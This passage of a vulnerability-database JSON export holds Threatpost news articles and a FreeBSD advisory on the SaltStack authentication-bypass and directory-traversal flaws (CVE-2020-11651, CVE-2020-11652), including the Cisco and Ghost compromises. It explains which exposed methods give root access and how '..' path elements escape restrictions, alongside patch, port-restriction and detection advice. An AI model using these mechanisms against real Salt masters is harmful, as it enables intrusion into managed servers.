"title": "Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-12T21:47:34", "bulletinFamily": "info", "description": "The open-source Salt management framework contains high-severity security vulnerabilities that allow full remote code execution as root on servers in data centers and cloud environments. And in-the-wild attacks are expected imminently.\n\nAccording to F-Secure researchers, the framework, authored by the company SaltStack but also used as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of servers, has a pair of flaws within its default communications protocol, known as ZeroMQ.\n\nA bug tracked as CVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bugs are especially dangerous given the topography of the Salt framework.\n\n\u201cEach server [managed by Salt] runs an agent called a \u2018minion,\u2019 which connects to a \u2018master,'\u201d explained F-Secure, [in a writeup](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) on Thursday. \u201c[A master is a] Salt installation that collects state reports from minions and publishes update messages that minions can act on.\u201d\n\nThese update messages are usually used to change the configuration of a selection of servers, but they can also be used to push out commands to multiple, or even all, of the managed systems, researchers said. An adversary thus can compromise the master in order to send malicious commands to all of the other servers in the cluster, all at the same time.\n\n## **Lapses in Protocol**\n\nTo communicate, the master uses two [ZeroMQ channels](<https://docs.saltstack.com/en/getstarted/system/communication.html>). As F-Secure explained, one is a \u201crequest server\u201d where minions can connect to report their status (or the output of commands). The other is a \u201cpublish server\u201d where the master publishes messages that the minions can connect and subscribe to.\n\nThe authentication bypass can be achieved because the ClearFuncs class processes unauthenticated requests and unintentionally exposes the \u201c_send_pub().\u201d This is the method used to queue messages from the master publish server to the minions \u2013 and thus can be used to send arbitrary commands. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nAlso, \u201cthe ClearFuncs class also exposes the method _prep_auth_info(), which returns the root key used to authenticate commands from the local root user on the master server. This root key can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\u201d\n\nAs for the directory traversal, the \u201cwheel\u201d module contains commands used to read and write files under specific directory paths.\n\n\u201cThe inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction,\u201d according to the writeup. \u201cThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing\u2026the reading of files outside of the intended directory.\u201d\n\nThe bugs together allow attackers \u201cwho can connect to the request server port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the master server filesystem and steal the secret key used to authenticate to the master as root,\u201d according to the firm.\n\nAccording to the National Vulnerability Database, \u201cThe salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\u201d\n\n## **Exploits in Less Than a Day**\n\nF-Secure said that it expects to see attacks in the wild very shortly.\n\n\u201cWe expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours,\u201d the researchers said, citing the \u201creliability and simplicity\u201d of exploitation.\n\nUnfortunately, the firm also said that a preliminary scan has revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet.\n\nPatches are available in release 3000.2. Also, \u201cadding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\u201d F-Secure concluded.\n\nTo detect a compromise, ASCII strings \u201c_prep_auth_info\u201d or \u201c_send_pub\u201d will show up in the request server port data (default 4506).\n\nAlso on the detection front, \u201cpublished messages to minions are called \u2018jobs\u2019 and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job IDs (\u2018jids\u2019) that look out of the ordinary,\u201d F-Secure noted.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "modified": "2020-04-30T20:54:50", "published": "2020-04-30T20:54:50", "id": "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "href": "https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "type": "threatpost", "title": "Salt Bugs Allow Full RCE as Root on Cloud Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-28T21:01:02", "bulletinFamily": "info", "description": "Cisco said attackers have been able to compromise its servers after exploiting two known, critical[ SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which are used in Cisco network-tooling products.\n\nTwo Cisco products incorporate a version of SaltStack that is running the vulnerable salt-master service. The first is Cisco Modeling Labs Corporate Edition (CML), which gives users a virtual sandbox environment to design and configure network topologies. The second is Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), used to design, configure and operate networks using versions of Cisco\u2019s network operating systems.\n\nHackers were able to successfully exploit the flaws incorporated in the latter product, resulting in the compromise of six VIRL-PE backend servers, according to Cisco. Those servers are: us-1.virl.info, us-2.virl.info, us-3.virl.info, us-4.virl.info, vsm-us-1.virl.info and vsm-us-2.virl.info.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE,\u201d according to [Cisco\u2019s Thursday alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>). \u201cThose servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.\u201d\n\nCisco said the servers were remediated on May 7. The company also released software updates for the two vulnerable products. Cisco said that the update is \u201ccritical,\u201d ranking it 10 out of 10 on the CVSS scale.\n\nThe SaltStack bugs were first made public by the Salt Open Core team on April 29. The flaws can allow full remote code execution as root on servers in data centers and cloud environments. They include an authentication bypass issue, tracked as CVE-2020-11651, and a directory-traversal flaw, CVE-2020-11652, where untrusted inputs (i.e. parameters in network requests) are not sanitized correctly. This in turn allows access to the entire file system of the master server, researchers found.\n\nSaltStack released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet \u2014 and warned that exploits in the wild are imminent.\n\nThose predictions have proved true: In the beginning of May, for instance, hackers targeted the publishing platform Ghost by exploiting critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure to launch a cryptojacking attack against its servers that led to widespread outages.\n\nCisco said that for Cisco CML and Cisco VIRL-PE (software releases 1.5 and 1.6) if the salt-master service is enabled \u201cthe exploitability of the product depends on how the product has been deployed.\u201d A full list of the impact and recommended action for each deployment option, for each Cisco software release, [can be found on Cisco\u2019s alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>).\n\nTo be exploited, the salt-master service must be reachable on TCP ports 4505 and 4506, Cisco said. The company added that administrators can check their configured Cisco salt-master server by navigating to VIRL Server > Salt Configuration and Status.\n\n\u201cCisco continues to strongly recommend that customers upgrade to a fixed software release to remediate these vulnerabilities,\u201d Cisco said.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "modified": "2020-05-28T20:51:25", "published": "2020-05-28T20:51:25", "id": "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "href": "https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/", "type": "threatpost", "title": "Hackers Compromise Cisco Servers Via SaltStack Flaws", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2020-05-16T11:07:00", "bulletinFamily": "unix", "description": "\nF-Secure reports:\n\nCVE-2020-11651 - Authentication bypass vulnerabilities\nThe ClearFuncs class processes unauthenticated requests and\n\t unintentionally exposes the _send_pub() method, which can be used to\n\t queue messages directly on the master publish server. Such messages\n\t can be used to trigger minions to run arbitrary commands as root.\nThe ClearFuncs class also exposes the method _prep_auth_info(),\n\t which returns the \"root key\" used to authenticate commands from the\n\t local root user on the master server. This \"root key\" can then be\n\t used to remotely call administrative commands on the master server.\n\t This unintentional exposure provides a remote un-authenticated\n\t attacker with root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities\nThe wheel module contains commands used to read and write files\n\t under specific directory paths. The inputs to these functions are\n\t concatenated with the target directory and the resulting path is not\n\t canonicalized, leading to an escape of the intended path restriction.\nThe get_token() method of the salt.tokens.localfs class (which is\n\t exposed to unauthenticated requests by the ClearFuncs class) fails\n\t to sanitize the token input parameter which is then used as a\n\t filename, allowing insertion of \"..\" path elements and thus reading\n\t of files outside of the intended directory. The only restriction is\n\t that the file has to be deserializable by salt.payload.Serial.loads().\n\n", "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "6BF55AF9-973B-11EA-9F2C-38D547003487", "href": "https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html", "title": "salt -- multiple vulnerabilities in salt-master process", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
